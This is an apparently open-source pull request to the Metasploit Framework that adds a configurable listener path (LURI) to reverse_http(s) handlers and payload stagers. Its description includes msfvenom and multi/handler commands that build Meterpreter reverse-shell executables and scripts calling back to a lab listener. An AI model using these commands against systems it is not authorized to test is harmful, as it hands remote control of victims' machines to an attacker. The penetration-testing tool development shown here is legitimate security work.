### PR TITLE
Add support for LURI to handlers (rebase)

### DIFF
--- a/lib/msf/base/serializer/readable_text.rb
+++ b/lib/msf/base/serializer/readable_text.rb
@@ -530,6 +530,7 @@ class ReadableText
     columns << 'Id'
     columns << 'Type'
     columns << 'Checkin?' if show_extended
+    columns << 'Local URI' if show_extended
     columns << 'Information'
     columns << 'Connection'
 
@@ -555,6 +556,12 @@ class ReadableText
       if show_extended
         if session.respond_to?(:last_checkin) && session.last_checkin
           row << "#{(Time.now.to_i - session.last_checkin.to_i)}s ago"
+        else
+          row << '?'
+        end
+
+        if !session.exploit_datastore['LURI'].empty?
+          row << " (#{session.exploit_datastore['LURI']})"
         else
           row << '?'
         end
@@ -597,6 +604,7 @@ class ReadableText
       sess_type    = session.type.to_s
       sess_uuid    = session.payload_uuid.to_s
       sess_puid    = session.payload_uuid.respond_to?(:puid_hex) ? session.payload_uuid.puid_hex : nil
+      sess_luri    = session.exploit_datastore['LURI'] || ""
 
       sess_checkin = "<none>"
       sess_machine_id = session.machine_id.to_s
@@ -626,6 +634,9 @@ class ReadableText
       out << "   MachineID: #{sess_machine_id}\n"
       out << "     CheckIn: #{sess_checkin}\n"
       out << "  Registered: #{sess_registration}\n"
+      if !sess_luri.empty?
+        out << "        LURI: #{sess_luri}\n"
+      end
 
 
 

--- a/lib/msf/base/serializer/readable_text.rb
+++ b/lib/msf/base/serializer/readable_text.rb
@@ -560,7 +560,7 @@ class ReadableText
           row << '?'
         end
 
-        if !session.exploit_datastore['LURI'].empty?
+        if session.exploit_datastore.has_key?('LURI') and !session.exploit_datastore['LURI'].empty?
           row << " (#{session.exploit_datastore['LURI']})"
         else
           row << '?'

--- a/lib/msf/base/serializer/readable_text.rb
+++ b/lib/msf/base/serializer/readable_text.rb
@@ -471,7 +471,7 @@ class ReadableText
   def self.dump_references(mod, indent = '')
     output = ''
 
-    if (mod.respond_to? :references and mod.references and mod.references.length > 0)
+    if (mod.respond_to? :references && mod.references && mod.references.length > 0)
       output << "References:\n"
       mod.references.each { |ref|
         output << indent + ref.to_s + "\n"
@@ -560,7 +560,7 @@ class ReadableText
           row << '?'
         end
 
-        if session.exploit_datastore.has_key?('LURI') and !session.exploit_datastore['LURI'].empty?
+        if session.exploit_datastore.has_key?('LURI') && !session.exploit_datastore['LURI'].empty?
           row << " (#{session.exploit_datastore['LURI']})"
         else
           row << '?'

--- a/lib/msf/base/serializer/readable_text.rb
+++ b/lib/msf/base/serializer/readable_text.rb
@@ -678,6 +678,7 @@ class ReadableText
       if (verbose)
         uripath = ctx[0].get_resource if ctx[0].respond_to?(:get_resource)
         uripath = ctx[0].datastore['URIPATH'] if uripath.nil?
+        uripath = ctx[0].datastore['LURI'] if uripath.nil?
         row << (uripath || "")
         row << (framework.jobs[k].start_time || "")
       end

--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -140,7 +140,7 @@ module ReverseHttp
       end
     end
 
-    l
+    l.dup
   end
 
   # Create an HTTP listener
@@ -272,7 +272,7 @@ protected
       conn_id = conn_id[0...-1] if conn_id[-1] == '/'
     end
 
-    request_summary = "#{conn_id} with UA '#{req.headers['User-Agent']}'"
+    request_summary = "#{luri}#{req.relative_resource} with UA '#{req.headers['User-Agent']}'"
 
     # Validate known UUIDs for all requests if IgnoreUnknownPayloads is set
     if datastore['IgnoreUnknownPayloads'] && ! framework.uuid_db[uuid.puid_hex]

--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -66,7 +66,8 @@ module ReverseHttp
 
   def print_prefix
     if Thread.current[:cli]
-      super + "#{listener_uri} handling request from #{Thread.current[:cli].peerhost}; (UUID: #{uuid.to_s}) "
+      luri = datastore['LURI'].empty? ? "" : "-> (#{datastore['LURI']}) "
+      super + "#{listener_uri} handling request from #{Thread.current[:cli].peerhost}#{luri}; (UUID: #{uuid.to_s}) "
     else
       super
     end
@@ -285,7 +286,7 @@ protected
         resp.body = pkt.to_r
 
       when :init_python
-        print_status("Staging Python payload ...")
+        print_status("Staging Python payload...")
         url = payload_uri(req) + conn_id + '/'
         conn_id = (datastore['LURI']) + conn_id
 
@@ -315,7 +316,7 @@ protected
         })
 
       when :init_java
-        print_status("Staging Java payload ...")
+        print_status("Staging Java payload...")
         url = payload_uri(req) + conn_id + "/\x00"
         conn_id = (datastore['LURI']) + conn_id
 
@@ -340,7 +341,7 @@ protected
         })
 
       when :init_native
-        print_status("Staging Native payload ...")
+        print_status("Staging Native payload...")
         url = payload_uri(req) + conn_id + "/\x00"
         uri = URI(payload_uri(req) + conn_id)
         conn_id = (datastore['LURI']) + conn_id
@@ -377,7 +378,7 @@ protected
         end
 
       when :connect
-        print_status("Attaching orphaned/stageless session ...")
+        print_status("Attaching orphaned/stageless session...")
 
         resp.body = ''
         conn_id = req.relative_resource

--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -270,6 +270,9 @@ protected
     case info[:mode]
       when :init_connect
         print_status("Redirecting stageless connection from #{request_summary}")
+        if datastore['LURI'] != "/"
+          conn_id = (datastore['LURI']) + conn_id
+        end
 
         # Handle the case where stageless payloads call in on the same URI when they
         # first connect. From there, we tell them to callback on a connect URI that
@@ -378,6 +381,7 @@ protected
 
         resp.body = ''
         conn_id = req.relative_resource
+        conn_id = (datastore['LURI']) + conn_id
 
         # Short-circuit the payload's handle_connection processing for create_session
         create_session(cli, {

--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -46,7 +46,8 @@ module ReverseHttp
     register_options(
       [
         OptString.new('LHOST', [true, 'The local listener hostname']),
-        OptPort.new('LPORT', [true, 'The local listener port', 8080])
+        OptPort.new('LPORT', [true, 'The local listener port', 8080]),
+        OptString.new('LURI', [false, 'The HTTP Path', '/'])
       ], Msf::Handler::ReverseHttp)
 
     register_advanced_options(
@@ -76,7 +77,7 @@ module ReverseHttp
   # @return [String] A URI of the form +scheme://host:port/+
   def listener_uri(addr=datastore['LHOST'])
     uri_host = Rex::Socket.is_ipv6?(addr) ? "[#{addr}]" : addr
-    "#{scheme}://#{uri_host}:#{bind_port}/"
+    "#{scheme}://#{uri_host}:#{bind_port}" + datastore['LURI'] || "/"
   end
 
   # Return a URI suitable for placing in a payload.
@@ -103,7 +104,7 @@ module ReverseHttp
       callback_host = "#{callback_name}:#{callback_port}"
     end
 
-    "#{scheme}://#{callback_host}/"
+    "#{scheme}://#{callback_host}" + datastore['LURI']
   end
 
   # Use the {#refname} to determine whether this handler uses SSL or not
@@ -158,7 +159,7 @@ module ReverseHttp
     obj = self
 
     # Add the new resource
-    service.add_resource("/",
+    service.add_resource((datastore['LURI'] || "") + "/",
       'Proc' => Proc.new { |cli, req|
         on_request(cli, req, obj)
       },
@@ -178,7 +179,7 @@ module ReverseHttp
   #
   def stop_handler
     if self.service
-      self.service.remove_resource('/')
+      self.service.remove_resource((datastore['LURI'] || "") + "/")
       if self.service.resources.empty? && self.sessions == 0
         Rex::ServiceManager.stop_service(self.service)
       end
@@ -283,6 +284,7 @@ protected
       when :init_python
         print_status("Staging Python payload ...")
         url = payload_uri(req) + conn_id + '/'
+        conn_id = (datastore['LURI']) + conn_id
 
         blob = ""
         blob << obj.generate_stage(
@@ -337,6 +339,7 @@ protected
         print_status("Staging Native payload ...")
         url = payload_uri(req) + conn_id + "/\x00"
         uri = URI(payload_uri(req) + conn_id)
+        conn_id = (datastore['LURI']) + conn_id
 
         resp['Content-Type'] = 'application/octet-stream'
 

--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -47,7 +47,7 @@ module ReverseHttp
       [
         OptString.new('LHOST', [true, 'The local listener hostname']),
         OptPort.new('LPORT', [true, 'The local listener port', 8080]),
-        OptString.new('LURI', [false, 'The HTTP Path', '/'])
+        OptString.new('LURI', [false, 'The HTTP Path', ''])
       ], Msf::Handler::ReverseHttp)
 
     register_advanced_options(
@@ -314,6 +314,7 @@ protected
       when :init_java
         print_status("Staging Java payload ...")
         url = payload_uri(req) + conn_id + "/\x00"
+        conn_id = (datastore['LURI']) + conn_id
 
         blob = obj.generate_stage(
           uuid: uuid,

--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -105,7 +105,7 @@ module ReverseHttp
       callback_host = "#{callback_name}:#{callback_port}"
     end
 
-    "#{scheme}://#{callback_host}#{luri}/"
+    "#{scheme}://#{callback_host}"
   end
 
   # Use the {#refname} to determine whether this handler uses SSL or not
@@ -264,12 +264,15 @@ protected
     uuid.arch      ||= obj.arch
     uuid.platform  ||= obj.platform
 
-    conn_id = nil
+    conn_id = luri
     if info[:mode] && info[:mode] != :connect
-      conn_id = generate_uri_uuid(URI_CHECKSUM_CONN, uuid)
+      conn_id << generate_uri_uuid(URI_CHECKSUM_CONN, uuid)
+    else
+      conn_id << req.relative_resource
+      conn_id = conn_id[0...-1] if conn_id[-1] == '/'
     end
 
-    request_summary = "#{req.relative_resource} with UA '#{req.headers['User-Agent']}'"
+    request_summary = "#{conn_id} with UA '#{req.headers['User-Agent']}'"
 
     # Validate known UUIDs for all requests if IgnoreUnknownPayloads is set
     if datastore['IgnoreUnknownPayloads'] && ! framework.uuid_db[uuid.puid_hex]
@@ -287,11 +290,6 @@ protected
     end
 
     self.pending_connections += 1
-
-    unless luri.empty?
-      sep = conn_id && conn_id[0] == '/' ? '' : '/'
-      conn_id = "#{luri}#{sep}#{conn_id}"
-    end
 
     # Process the requested resource.
     case info[:mode]
@@ -401,15 +399,15 @@ protected
         print_status("Attaching orphaned/stageless session...")
 
         resp.body = ''
-        unless conn_id
-          conn_id = "#{luri}#{req.relative_resource}"
-        end
+
+        url = payload_uri(req) + conn_id
+        url << '/' unless url[-1] == '/'
 
         # Short-circuit the payload's handle_connection processing for create_session
         create_session(cli, {
           :passive_dispatcher => obj.service,
           :conn_id            => conn_id,
-          :url                => payload_uri(req) + conn_id + "/\x00",
+          :url                => url + "\x00",
           :expiration         => datastore['SessionExpirationTimeout'].to_i,
           :comm_timeout       => datastore['SessionCommunicationTimeout'].to_i,
           :retry_total        => datastore['SessionRetryTotal'].to_i,

--- a/lib/msf/core/payload/python/reverse_http.rb
+++ b/lib/msf/core/payload/python/reverse_http.rb
@@ -48,7 +48,7 @@ module Payload::Python::ReverseHttp
 
     target_url << ':'
     target_url << opts[:port].to_s
-    target_url << datastore['LURI']
+    target_url << luri
     target_url << generate_callback_uri(opts)
     target_url
   end
@@ -57,7 +57,7 @@ module Payload::Python::ReverseHttp
   # Return the longest URI that fits into our available space
   #
   def generate_callback_uri(opts={})
-    uri_req_len = 30 + datastore['LURI'].length + rand(256-(30+datastore['LURI'].length))
+    uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
 
     # Generate the short default URL if we don't have enough space
     if self.available_space.nil? || required_space > self.available_space

--- a/lib/msf/core/payload/python/reverse_http.rb
+++ b/lib/msf/core/payload/python/reverse_http.rb
@@ -48,6 +48,7 @@ module Payload::Python::ReverseHttp
 
     target_url << ':'
     target_url << opts[:port].to_s
+    target_url << datastore['LURI']
     target_url << generate_callback_uri(opts)
     target_url
   end

--- a/lib/msf/core/payload/python/reverse_http.rb
+++ b/lib/msf/core/payload/python/reverse_http.rb
@@ -57,7 +57,7 @@ module Payload::Python::ReverseHttp
   # Return the longest URI that fits into our available space
   #
   def generate_callback_uri(opts={})
-    uri_req_len = 30 + rand(256-30)
+    uri_req_len = 30 + datastore['LURI'].length + rand(256-(30+datastore['LURI'].length))
 
     # Generate the short default URL if we don't have enough space
     if self.available_space.nil? || required_space > self.available_space

--- a/lib/msf/core/payload/transport_config.rb
+++ b/lib/msf/core/payload/transport_config.rb
@@ -50,7 +50,7 @@ module Msf::Payload::TransportConfig
     unless uri
       type = opts[:stageless] == true ? :init_connect : :connect
       sum = uri_checksum_lookup(type)
-      uri = generate_uri_uuid(sum, opts[:uuid])
+      uri = luri + generate_uri_uuid(sum, opts[:uuid])
     end
 
     {

--- a/lib/msf/core/payload/windows/reverse_http.rb
+++ b/lib/msf/core/payload/windows/reverse_http.rb
@@ -98,7 +98,7 @@ module Payload::Windows::ReverseHttp
 
     # Choose a random URI length between 30 and 255 bytes
     if uri_req_len == 0
-      uri_req_len = 30 + rand(256-30)
+      uri_req_len = 30 + datastore['LURI'].length + rand(256-(30+datastore['LURI'].length))
     end
 
     if uri_req_len < 5

--- a/lib/msf/core/payload/windows/reverse_http.rb
+++ b/lib/msf/core/payload/windows/reverse_http.rb
@@ -51,7 +51,7 @@ module Payload::Windows::ReverseHttp
 
     # Add extra options if we have enough space
     unless self.available_space.nil? || required_space > self.available_space
-      conf[:url]        = generate_uri
+      conf[:url]        = datastore['LURI'] + generate_uri
       conf[:exitfunk]   = datastore['EXITFUNC']
       conf[:ua]         = datastore['MeterpreterUserAgent']
       conf[:proxy_host] = datastore['PayloadProxyHost']

--- a/lib/msf/core/payload/windows/reverse_http.rb
+++ b/lib/msf/core/payload/windows/reverse_http.rb
@@ -51,7 +51,7 @@ module Payload::Windows::ReverseHttp
 
     # Add extra options if we have enough space
     unless self.available_space.nil? || required_space > self.available_space
-      conf[:url]        = datastore['LURI'] + generate_uri
+      conf[:url]        = luri + generate_uri
       conf[:exitfunk]   = datastore['EXITFUNC']
       conf[:ua]         = datastore['MeterpreterUserAgent']
       conf[:proxy_host] = datastore['PayloadProxyHost']
@@ -61,7 +61,7 @@ module Payload::Windows::ReverseHttp
       conf[:proxy_type] = datastore['PayloadProxyType']
     else
       # Otherwise default to small URIs
-      conf[:url]        = generate_small_uri
+      conf[:url]        = luri + generate_small_uri
     end
 
     generate_reverse_http(conf)
@@ -98,7 +98,7 @@ module Payload::Windows::ReverseHttp
 
     # Choose a random URI length between 30 and 255 bytes
     if uri_req_len == 0
-      uri_req_len = 30 + datastore['LURI'].length + rand(256-(30+datastore['LURI'].length))
+      uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
     end
 
     if uri_req_len < 5

--- a/lib/msf/core/payload/windows/x64/reverse_http.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_http.rb
@@ -55,7 +55,7 @@ module Payload::Windows::ReverseHttp_x64
 
     # add extended options if we do have enough space
     unless self.available_space.nil? || required_space > self.available_space
-      conf[:url]        = datastore['LURI'] + generate_uri
+      conf[:url]        = luri + generate_uri
       conf[:exitfunk]   = datastore['EXITFUNC']
       conf[:ua]         = datastore['MeterpreterUserAgent']
       conf[:proxy_host] = datastore['PayloadProxyHost']
@@ -65,7 +65,7 @@ module Payload::Windows::ReverseHttp_x64
       conf[:proxy_type] = datastore['PayloadProxyType']
      else
       # Otherwise default to small URIs
-      conf[:url]        = generate_small_uri
+      conf[:url]        = luri + generate_small_uri
     end
 
     generate_reverse_http(conf)
@@ -96,7 +96,7 @@ module Payload::Windows::ReverseHttp_x64
 
     # Choose a random URI length between 30 and 255 bytes
     if uri_req_len == 0
-      uri_req_len = 30 + datastore['LURI'].length + rand(256-(30+datastore['LURI'].length))
+      uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
 
     end
 

--- a/lib/msf/core/payload/windows/x64/reverse_http.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_http.rb
@@ -55,7 +55,7 @@ module Payload::Windows::ReverseHttp_x64
 
     # add extended options if we do have enough space
     unless self.available_space.nil? || required_space > self.available_space
-      conf[:url]        = generate_uri
+      conf[:url]        = datastore['LURI'] + generate_uri
       conf[:exitfunk]   = datastore['EXITFUNC']
       conf[:ua]         = datastore['MeterpreterUserAgent']
       conf[:proxy_host] = datastore['PayloadProxyHost']
@@ -96,7 +96,8 @@ module Payload::Windows::ReverseHttp_x64
 
     # Choose a random URI length between 30 and 255 bytes
     if uri_req_len == 0
-      uri_req_len = 30 + rand(256-30)
+      uri_req_len = 30 + datastore['LURI'].length + rand(256-(30+datastore['LURI'].length))
+
     end
 
     if uri_req_len < 5

--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -644,6 +644,16 @@ class ClientCore < Extension
     scheme = opts[:transport].split('_')[1]
     url = "#{scheme}://#{opts[:lhost]}:#{opts[:lport]}"
 
+    if opts[:luri] && opts[:luri].length > 0
+      if opts[:luri][0] != '/'
+        url << '/'
+      end
+      url << opts[:luri]
+      if url[-1] == '/'
+        url = url[0...-1]
+      end
+    end
+
     if opts[:comm_timeout]
       request.add_tlv(TLV_TYPE_TRANS_COMM_TIMEOUT, opts[:comm_timeout])
     end

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
@@ -575,6 +575,7 @@ class Console::CommandDispatcher::Core
     '-p'  => [ true,  'LPORT parameter' ],
     '-i'  => [ true,  'Specify transport by index (currently supported: remove)' ],
     '-u'  => [ true,  'Custom URI for HTTP/S transports (used when removing transports)' ],
+    '-lu' => [ true,  'Local URI for HTTP/S transports (used when adding/changing transports with a custom LURI)' ],
     '-ua' => [ true,  'User agent for HTTP/S transports (optional)' ],
     '-ph' => [ true,  'Proxy host for HTTP/S transports (optional)' ],
     '-pp' => [ true,  'Proxy port for HTTP/S transports (optional)' ],
@@ -656,6 +657,8 @@ class Console::CommandDispatcher::Core
         opts[:uri] = val
       when '-i'
         transport_index = val.to_i
+      when '-lu'
+        opts[:luri] = val
       when '-ph'
         opts[:proxy_host] = val
       when '-pp'

--- a/modules/payloads/singles/python/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb
@@ -35,7 +35,7 @@ module MetasploitModule
   def generate_reverse_http(opts={})
     opts[:uri_uuid_mode] = :init_connect
     met = stage_meterpreter({
-      http_url: generate_callback_url(opts),
+      http_url:        luri + generate_callback_url(opts),
       http_user_agent: opts[:user_agent],
       http_proxy_host: opts[:proxy_host],
       http_proxy_port: opts[:proxy_port]

--- a/modules/payloads/singles/python/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb
@@ -35,7 +35,7 @@ module MetasploitModule
   def generate_reverse_http(opts={})
     opts[:uri_uuid_mode] = :init_connect
     met = stage_meterpreter({
-      http_url:        luri + generate_callback_url(opts),
+      http_url:        generate_callback_url(opts),
       http_user_agent: opts[:user_agent],
       http_proxy_host: opts[:proxy_host],
       http_proxy_port: opts[:proxy_port]

--- a/modules/payloads/singles/python/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb
@@ -36,7 +36,7 @@ module MetasploitModule
     opts[:scheme] = 'https'
     opts[:uri_uuid_mode] = :init_connect
     met = stage_meterpreter({
-      http_url: generate_callback_url(opts),
+      http_url:        luri + generate_callback_url(opts),
       http_user_agent: opts[:user_agent],
       http_proxy_host: opts[:proxy_host],
       http_proxy_port: opts[:proxy_port]

--- a/modules/payloads/singles/python/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb
@@ -36,7 +36,7 @@ module MetasploitModule
     opts[:scheme] = 'https'
     opts[:uri_uuid_mode] = :init_connect
     met = stage_meterpreter({
-      http_url:        luri + generate_callback_url(opts),
+      http_url:        generate_callback_url(opts),
       http_user_agent: opts[:user_agent],
       http_proxy_host: opts[:proxy_host],
       http_proxy_port: opts[:proxy_port]

--- a/modules/payloads/stagers/android/reverse_http.rb
+++ b/modules/payloads/stagers/android/reverse_http.rb
@@ -36,7 +36,7 @@ module MetasploitModule
       uri_req_len = 5
     end
 
-    url = "http://#{datastore["LHOST"]}:#{datastore["LPORT"]}#{luri}/"
+    url = "http://#{datastore["LHOST"]}:#{datastore["LPORT"]}#{luri}"
     # TODO: perhaps wire in an existing UUID from opts?
     url << generate_uri_uuid_mode(:init_java, uri_req_len)
 

--- a/modules/payloads/stagers/android/reverse_http.rb
+++ b/modules/payloads/stagers/android/reverse_http.rb
@@ -30,13 +30,13 @@ module MetasploitModule
 
   def generate_jar(opts={})
     # Default URL length is 30-256 bytes
-    uri_req_len = 30 + rand(256-30)
+    uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
     # Generate the short default URL if we don't know available space
     if self.available_space.nil?
       uri_req_len = 5
     end
 
-    url = "http://#{datastore["LHOST"]}:#{datastore["LPORT"]}/"
+    url = "http://#{datastore["LHOST"]}:#{datastore["LPORT"]}#{luri}/"
     # TODO: perhaps wire in an existing UUID from opts?
     url << generate_uri_uuid_mode(:init_java, uri_req_len)
 

--- a/modules/payloads/stagers/android/reverse_https.rb
+++ b/modules/payloads/stagers/android/reverse_https.rb
@@ -36,7 +36,7 @@ module MetasploitModule
       uri_req_len = 5
     end
 
-    url = "https://#{datastore["LHOST"]}:#{datastore["LPORT"]}/"
+    url = "https://#{datastore["LHOST"]}:#{datastore["LPORT"]}#{luri}"
     # TODO: perhaps wire in an existing UUID from opts?
     url << generate_uri_uuid_mode(:init_java, uri_req_len)
 

--- a/modules/payloads/stagers/java/reverse_http.rb
+++ b/modules/payloads/stagers/java/reverse_http.rb
@@ -53,8 +53,8 @@ module MetasploitModule
     c << "Spawn=#{spawn}\n"
     c << "URL=http://#{datastore["LHOST"]}"
     c << ":#{datastore["LPORT"]}" if datastore["LPORT"]
-    c << "#{luri}/"
-    c << generate_uri_checksum(Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, uri_req_len)
+    c << "#{luri}"
+    c << generate_uri_checksum(:init_java, uri_req_len)
     c << "\n"
 
     c

--- a/modules/payloads/stagers/java/reverse_http.rb
+++ b/modules/payloads/stagers/java/reverse_http.rb
@@ -54,7 +54,7 @@ module MetasploitModule
     c << "URL=http://#{datastore["LHOST"]}"
     c << ":#{datastore["LPORT"]}" if datastore["LPORT"]
     c << "#{luri}"
-    c << generate_uri_checksum(:init_java, uri_req_len)
+    c << generate_uri_uuid_mode(:init_java, uri_req_len)
     c << "\n"
 
     c

--- a/modules/payloads/stagers/java/reverse_http.rb
+++ b/modules/payloads/stagers/java/reverse_http.rb
@@ -41,7 +41,7 @@ module MetasploitModule
 
   def config
     # Default URL length is 30-256 bytes
-    uri_req_len = 30 + rand(256-30)
+    uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
 
     # Generate the short default URL if we don't know available space
     if self.available_space.nil?
@@ -53,7 +53,7 @@ module MetasploitModule
     c << "Spawn=#{spawn}\n"
     c << "URL=http://#{datastore["LHOST"]}"
     c << ":#{datastore["LPORT"]}" if datastore["LPORT"]
-    c << "/"
+    c << "#{luri}/"
     c << generate_uri_checksum(Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, uri_req_len)
     c << "\n"
 

--- a/modules/payloads/stagers/java/reverse_https.rb
+++ b/modules/payloads/stagers/java/reverse_https.rb
@@ -57,6 +57,7 @@ module MetasploitModule
     c << "Spawn=#{spawn}\n"
     c << "URL=https://#{datastore["LHOST"]}"
     c << ":#{datastore["LPORT"]}" if datastore["LPORT"]
+    c << "#{luri}"
     c << generate_uri_uuid_mode(:init_java, uri_req_len)
     c << "\n"
 


### PR DESCRIPTION
Allows specifying a `LURI` to a handler as in #4623. This is a rebase of #6342
## Verification

---
- python, windows reverse_http(s) under different paths:

```
use multi/handler

setg ExitOnSession false
setg LHOST 192.168.56.1

set payload windows/meterpreter/reverse_http
set LURI /foo
exploit -j -z
set LURI /bar
exploit -j -z

set payload python/meterpreter/reverse_http
set LURI /baz
exploit -j -z
set LURI /quux
exploit -j -z
```

```
msfvenom -p windows/meterpreter/reverse_http -f exe -o revhttp_foo.exe LHOST=192.168.56.1 LURI=/foo
msfvenom -p windows/meterpreter/reverse_http -f exe -o revhttp_bar.exe LHOST=192.168.56.1 LURI=/bar
msfvenom -p python/meterpreter/reverse_http -f raw -o revhttp_baz.py LHOST=192.168.56.1 LURI=/baz
msfvenom -p python/meterpreter/reverse_http -f raw -o revhttp_quux.py LHOST=192.168.56.1 LURI=/quux
```

Both .exes, .pys will connect under their respective paths as seen in wireshark. Both handlers can listen at the same time.
![Wireshark](http://i.imgur.com/brEcNOS.png)

`jobs -v` shows `URIPATH` if `URIPATH.nil`

```
msf exploit(handler) > jobs -v

Jobs
====

  Id  Name                    Payload                        LPORT  URIPATH       Start Time
  --  ----                    -------                        -----  -------       ----------
  0   Exploit: multi/handler  java/meterpreter/reverse_http  8080   /java_staged  2015-12-14 16:13:57 +0000
  1   Exploit: multi/handler  java/meterpreter/reverse_http  8080                 2015-12-14 16:13:57 +0000
```

`sessions -l` and `sessions -v` shows `LURI`

```
msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type                       Information                      Connection
  --  ----                       -----------                      ----------
  1   meterpreter python/python  rmcnamara @ MacBook-Pro-2.local  192.168.56.1:8080 -> 192.168.56.1:52958 (192.168.56.1)
  2   meterpreter python/python  rmcnamara @ MacBook-Pro-2.local  192.168.56.1:8080 -> 192.168.56.1:52964 (/python_staged) (192.168.56.1)
```

```
msf exploit(handler) > sessions -v

Active sessions
===============

  Session ID: 1
        Type: meterpreter python/python
        Info: rmcnamara @ MacBook-Pro-2.local
      Tunnel: 192.168.56.1:8080 -> 192.168.56.1:52958 (192.168.56.1)
         Via: exploit/multi/handler
        UUID: 0f5425b5c6ab945e/python=20/python=21/2015-12-14T12:52:00Z
   MachineID: 654fa86c74df18dfd4b68c92929899bf
     CheckIn: 0s ago @ 2015-12-14 16:36:26 +0000
  Registered: No

  Session ID: 2
        Type: meterpreter python/python
        Info: rmcnamara @ MacBook-Pro-2.local
      Tunnel: 192.168.56.1:8080 -> 192.168.56.1:52964 (192.168.56.1)
         Via: exploit/multi/handler
        UUID: e27ae7f70533cab9/python=20/python=21/2015-12-14T12:51:40Z
   MachineID: 654fa86c74df18dfd4b68c92929899bf
     CheckIn: 0s ago @ 2015-12-14 16:36:26 +0000
  Registered: No
        LURI: /python_staged

```
- Show `LURI` in new connection:

```
[*] 192.168.56.102:49512 -> (/wst) (UUID: 423bca3c89c5db0b/x86=1/windows=1/2015-12-15T09:56:36Z) Staging Native payload ...
[*] Meterpreter session 1 opened (192.168.56.1:8080 -> 192.168.56.102:49512) at 2015-12-15 09:57:09 +0000
[*] 192.168.56.102:49513 (UUID: 09077cdd28ff8394/x86=1/windows=1/2015-12-15T09:56:57Z) Staging Native payload ...
[*] Meterpreter session 2 opened (192.168.56.1:8080 -> 192.168.56.102:49513) at 2015-12-15 09:57:09 +0000
```
## Checklist
- Original behaviour
  - [x] `windows/meterpreter/reverse_http(s)`
  - [x] `windows/meterpreter_reverse_http(s)`
  - [x] `windows/x64/meterpreter/reverse_http(s)`
  - [x] `windows/x64/meterpreter_reverse_http(s)`
  - [x] `python/meterpreter/reverse_http(s)`
  - [x] `python/meterpreter_reverse_http(s)`
  - [x] `java/meterpreter/reverse_http(s)`
- New behaviour, `LURI` used
  - [x] `windows/meterpreter/reverse_http(s)`
  - [x] `windows/meterpreter_reverse_http(s)`
  - [x] `windows/x64/meterpreter/reverse_http(s)`
  - [x] `windows/x64/meterpreter_reverse_http(s)`
  - [x] `python/meterpreter/reverse_http(s)`
  - [x] `python/meterpreter_reverse_http(s)`
  - [x] `java/meterpreter/reverse_http(s)`
  - [x] Orphaned Sessions
  - [x] Multiple `LURI` including blank
  - [x] At least `jobs -v` output to distinguish _see above_
  - [x] Everything, plus https:

```
use multi/handler

setg ExitOnSession false
setg LHOST 192.168.56.1

set payload windows/meterpreter/reverse_http
set LURI /wst
exploit -j -z
set payload windows/meterpreter_reverse_http
set LURI /wus
exploit -j -z
set payload windows/x64/meterpreter/reverse_http
set LURI /wst64
exploit -j -z
set payload windows/x64/meterpreter_reverse_http
set LURI /wus64
exploit -j -z
set payload python/meterpreter/reverse_http
set LURI /pst
exploit -j -z
set payload python/meterpreter_reverse_http
set LURI /pus
exploit -j -z 
set payload java/meterpreter/reverse_http
set LURI /jst
exploit -j -z
```

```
msfvenom -p windows/meterpreter/reverse_http -f exe -o wst.exe LHOST=192.168.56.1 LURI=/wst
msfvenom -p windows/meterpreter_reverse_http -f exe -o wus.exe LHOST=192.168.56.1 LURI=/wus
msfvenom -p windows/x64/meterpreter/reverse_http -f exe -o wst64.exe LHOST=192.168.56.1 LURI=/wst64
msfvenom -p windows/x64/meterpreter_reverse_http -f exe -o wus64.exe LHOST=192.168.56.1 LURI=/wus64
msfvenom -p python/meterpreter/reverse_http -f raw -o pst.py LHOST=192.168.56.1 LURI=/pst
msfvenom -p python/meterpreter_reverse_http -f raw -o pus.py LHOST=192.168.56.1 LURI=/pus
msfvenom -p java/meterpreter/reverse_http -f raw -o jst.jar LHOST=192.168.56.1 LURI=/jst
```
